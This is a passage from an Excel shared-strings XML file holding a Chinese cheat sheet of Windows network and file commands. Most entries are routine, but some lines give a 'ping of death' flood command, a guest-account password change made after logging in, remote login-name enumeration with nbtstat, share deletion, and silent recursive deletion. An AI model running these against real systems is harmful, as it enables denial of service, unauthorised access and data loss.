        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>文本信息</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">" </t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>向对方发信息</t>
    </r>
  </si>
  <si>
    <r>
      <t xml:space="preserve">net ver </t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>局域网内正在使用的网络连接类型和信息</t>
    </r>
  </si>
  <si>
    <r>
      <t xml:space="preserve">net share </t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>查看本地开启的共享</t>
    </r>
  </si>
  <si>
    <r>
      <t xml:space="preserve">net share ipc$ </t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>开启</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>ipc$</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>共享</t>
    </r>
  </si>
  <si>
    <r>
      <t xml:space="preserve">net share ipc$ /del </t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>删除</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>ipc$</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>共享</t>
    </r>
  </si>
  <si>
    <r>
      <t xml:space="preserve">net share c$ /del </t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>删除</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>C</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>：共享</t>
    </r>
  </si>
  <si>
    <r>
      <t xml:space="preserve">net user guest 12345 </t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>用</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>guest</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>用户登陆后用将密码改为</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>12345</t>
    </r>
  </si>
  <si>
    <r>
      <t xml:space="preserve">net password </t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>密码</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>更改系统登陆密码</t>
    </r>
  </si>
  <si>
    <r>
      <t xml:space="preserve">netstat -a </t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>查看开启了哪些端口</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>,</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>常用</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>netstat -an</t>
    </r>
  </si>
  <si>
    <r>
      <t xml:space="preserve">netstat -n </t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>查看端口的网络连接情况，常用</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>netstat -an</t>
    </r>
  </si>
  <si>
    <r>
      <t xml:space="preserve">netstat -v </t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>查看正在进行的工作</t>
    </r>
  </si>
  <si>
    <r>
      <t xml:space="preserve">netstat -p </t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>协议名</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>例：</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">netstat -p tcq/ip </t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>查看某协议使用情况（查看</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>tcp/ip</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>协议使用情况）</t>
    </r>
  </si>
  <si>
    <r>
      <t xml:space="preserve">netstat -s </t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>查看正在使用的所有协议使用情况</t>
    </r>
  </si>
  <si>
    <r>
      <t xml:space="preserve">nbtstat -A ip </t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>对方</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>136</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>到</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>139</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>其中一个端口开了的话，就可查看对方最近登陆的用户名（</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>03</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>前的为用户名）</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>注意：参数</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>-A</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>要大写</t>
    </r>
  </si>
  <si>
    <r>
      <t>tracert -</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>参数</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> ip(</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>或计算机名</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">) </t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>跟踪路由（数据包），参数：“</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>-w</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>数字”用于设置超时间隔。</t>
    </r>
  </si>
  <si>
    <r>
      <t>ping ip(</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>或域名</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">) </t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>向对方主机发送默认大小为</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>32</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>字节的数据，参数：“</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>-l[</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>空格</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>]</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>数据包大小”；“</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>-n</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>发送数据次数”；“</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>-t</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>”指一直</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>ping</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>。</t>
    </r>
  </si>
  <si>
    <r>
      <t xml:space="preserve">ping -t -l 65550 ip </t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>死亡之</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>ping(</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>发送大于</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>64K</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>的文件并一直</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>ping</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>就成了死亡之</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>ping)</t>
    </r>
  </si>
  <si>
    <r>
      <t xml:space="preserve">ipconfig (winipcfg) </t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>用于</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>windows NT</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>及</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>XP(windows 95 98)</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>查看本地</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>ip</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>地址，</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>ipconfig</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>可用参数“</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>/all</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>”显示全部配置信息</t>
    </r>
  </si>
  <si>
    <r>
      <t xml:space="preserve">tlist -t </t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>以树行列表显示进程</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>(</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>为系统的附加工具，默认是没有安装的，在安装目录的</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>Support/tools</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>文件夹内</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>)</t>
    </r>
  </si>
  <si>
    <r>
      <t xml:space="preserve">kill -F </t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>进程名加</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>-F</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>参数后强制结束某进程</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>(</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>为系统的附加工具，默认是没有安装的，在安装目录的</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>Support/tools</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>文件夹内</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>)</t>
    </r>
  </si>
  <si>
    <r>
      <t xml:space="preserve">del -F </t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>文件名加</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>-F</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>参数后就可删除只读文件</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>,/AR</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>、</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>/AH</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>、</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>/AS</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>、</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>/AA</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>分别表示删除只读、隐藏、系统、存档文件，</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>/A-R</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>、</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>/A-H</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>、</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>/A-S</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>、</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>/A-A</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>表示删除除只读、隐藏、系统、存档以外的文件。例如“</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>DEL/AR *.*</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>”表示删除当前目录下所有只读文件，“</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>DEL/A-S *.*</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>”表示删除当前目录下除系统文件以外的所有文件</t>
    </r>
  </si>
  <si>
    <r>
      <t xml:space="preserve">del /S /Q </t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>目录</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>或用：</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">rmdir /s /Q </t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>目录</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> /S</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>删除目录及目录下的所有子目录和文件。同时使用参数</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">/Q </t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>可取消删除操作时的系统确认就直接删除。（二个命令作用相同）</t>
    </r>
  </si>
  <si>
    <r>
      <t xml:space="preserve">move </t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>盘符</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>\</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>路径</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>\</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>要移动的文件名</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>存放移动文件的路径</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>\</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>移动后文件名移动文件</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>,</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>用参数</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>/y</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>将取消确认移动目录存在相同文件的提示就直接覆盖</t>
    </r>
  </si>
  <si>
    <r>
      <t xml:space="preserve">fc one.txt two.txt &gt; 3st.txt </t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>对比二个文件并把不同之处输出到</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>3st.txt</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>文件中，</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>"&gt; "</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
